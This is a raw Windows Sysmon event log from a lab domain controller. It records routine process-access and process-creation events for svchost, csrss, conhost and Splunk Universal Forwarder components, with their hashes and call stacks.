13:44:46.283{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:46.283{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:46.283{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:46.283{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:46.283{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:46.283{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:46.283{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:46.283{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:46.283{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90CE-6005-4101-00000000A301}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:46.283{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-90CE-6005-4101-00000000A301}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:46.144{59A5CD1D-90CE-6005-4101-00000000A301}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:47.517{59A5CD1D-90CF-6005-4201-00000000A301}48844396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:47.376{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-90CF-6005-4201-00000000A301}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:47.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:47.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:47.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:47.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:47.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:47.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:47.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:44:47.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:47.376{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:47.376{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90CF-6005-4201-00000000A301}4884C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:47.376{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-90CF-6005-4201-00000000A301}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:47.236{59A5CD1D-90CF-6005-4201-00000000A301}4884C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:48.876{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-90D0-6005-4401-00000000A301}4708C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 